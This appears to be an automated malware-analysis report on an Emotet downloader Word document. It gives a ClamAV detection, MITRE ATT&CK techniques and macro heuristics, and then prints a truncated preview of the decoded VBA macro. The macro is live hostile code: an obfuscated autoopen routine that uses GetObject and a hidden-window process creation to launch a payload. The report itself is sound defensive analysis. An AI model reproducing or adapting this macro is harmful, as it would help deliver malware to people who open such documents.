Verdict: MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1203 Exploitation for Client Execution
The file is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6914197-0', indicating it is likely part of the Emotet family. Static analysis revealed the presence of a VBA macro with an autoopen function, which is a common execution vector for Emotet. The macro's obfuscated code, including a GetObject call, suggests it is designed to download and execute a secondary payload.
Heuristics (7)
- ClamAV: Doc.Downloader.Emotet-6914197-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6914197-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14936 bytes |

SHA-256: ca18c7eca15ddd923ed0789af74ccd2762da72b340ce39e4f4d648c69e026257

Script preview (first 1,000 lines of the extracted script):
```vba
Attribute VB_Name = "F4oUXAU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "BGwAD1"
Attribute VB_Base = "0{75ED0DD9-AFB7-4BBE-9B43-B5CEF959467A}{169C0824-A931-42B7-8B7C-90176A97DA36}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "d_kDCBUA"
Attribute VB_Base = "0{827DDE68-7ADF-4EF2-AD66-4A072186267A}{0FA90AFB-7187-4285-827C-7AFE567C3109}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "zXAAADAc"
Sub autoopen()
On Error Resume Next
Select Case NAxoZ_B
Case 552627650
PDAXAA = oAAAQAA / 827384356 / _
dAAAokBD - CInt(jQAA1o + CInt(498114999)) + _
(429428715 * CLng(983895741))
SoZ44o4 = 196175064 * iBAc1AoZ
WAQUA_c = 363782692 - 666563882 + _
123144297 - ZAXAQAAA / s_xUBA - Tan(986429207)
End Select
Select Case zBAU1kAA
Case 649585586
owBDAxAA = ZCA_BZ / 198442998 / _
oBADxA - CInt(OBAoABU + CInt(797539556)) + _
(239755694 * CLng(348758256))
wACC4ZA = 12786818 * f4ADDAoA
zAZwcA = 746862660 - 93594029 + _
932590376 - IXAACAC / LB_BAxw - Tan(355180009)
End Select
Select Case UXAAkD
Case 782412030
T_Z_DAA = XBCB4BAA / 720627370 / _
MDAAUo_ - CInt(wADCQD + CInt(942244244)) + _
(251421645 * CLng(769844241))
dCAAADBB = 259209376 * jAUD1A
MA_4AAAx = 779348900 - 235786462 + _
621967272 - fAQ1QB / Bo1AAG_ - Tan(239709486)
End Select
Set P41oAXA = GetObject(BGwAD1.wBQkAA + d_kDCBUA.T_DQQAZ + BGwAD1.wBQkAA)
Select Case u1BAQQXA
Case 30193339
cAwGAA = bUABABA / 362330586 / _
c1cccQx - CInt(VZBBAG + CInt(267226572)) + _
(492521700 * CLng(313397435))
YUC4AZA = 721346944 * ZUQC_AAB
jDAZBcQ = 816548745 - 903351210 + _
783641887 - WwcBADBZ / GwADxo - Tan(967269547)
End Select
Select Case QG_BkUU4
Case 342644650
YQCABAGU = aZAAkZ / 804034675 / _
ZAkCAAA - CInt(nAUAkCck + CInt(941343626)) + _
(65902322 * CLng(876627692))
DkZAAXA = 2007392 * ICBADBo
qCCo_4U = 301883740 - 939857073 + _
4276456 - dGA4xAAx / mBAQCQ - Tan(625025206)
End Select
Select Case kwCAABQA
Case 967000683
doACwB = UAXoZ1A / 792002400 / _
J4Uw1x1 - CInt(fc1XxD + CInt(452474668)) + _
(586971416 * CLng(799644976))
FABAAw = 485825059 * jAQZAQB
i1G_AU4 = 97368666 - 449027204 + _
186953635 - kBAwAk / WDQcAUAw - Tan(789194994)
End Select
P41oAXA.ShowWindow = 316725 - 316725
Select Case LcZGAUDU
Case 302811264
zZxABUU = J_okDA / 711472868 / _
A1ABkA - CInt(iAABAAc + CInt(207670542)) + _
(644429687 * CLng(146613637))
S4UUQQQ = 102044779 * vxAA14
TDAxAAB = 585167379 - 134492405 + _
652088754 - lGAUAU4Q / tQX1kAA - Tan(791221387)
End Select
Select Case NZ1QcAAc
Case 738526438
TAoxA_ = iAADAA / 156520915 / _
bkGoAA - CInt(NxAQAQAA + CInt(591200016)) + _
(504759482 * CLng(514821976))
PAABUC = 526043205 * uA4xAAA
hwAAAAZ = 414864541 - 975938851 + _
921707971 - GA4GwX / a1DQQk_ - Tan(947754572)
End Select
Select Case QA_AxX
Case 303487230
RBUAAkQA = vcCDxU / 659205021 / _
aGAxAAXC - CInt(d_wDGAoA + CInt(55786465)) + _
(911374040 * CLng(809257077))
HDxwUAAZ = 355880773 * XDxBc14
lA4G4A1 = 139668389 - 640127231 + _
603418556 - zcXCAQAA / LQGA4QA - Tan(776835008)
End Select
GetObject(BGwAD1.wBQkAA + d_kDCBUA.JcZXQCBB + BGwAD1.wBQkAA) _
.Create BGwAD1.wBQkAA + d_kDCBUA.RDBZUD + BGwAD1.wBQkAA + d_kDCBUA.kk_cwA + BGwAD1.wBQkAA + BGwAD1.wBQkAA + d_kDCBUA.bwCZZ_4 + BGwAD1.wBQkAA + BGwAD1.wBQ
```
... (truncated)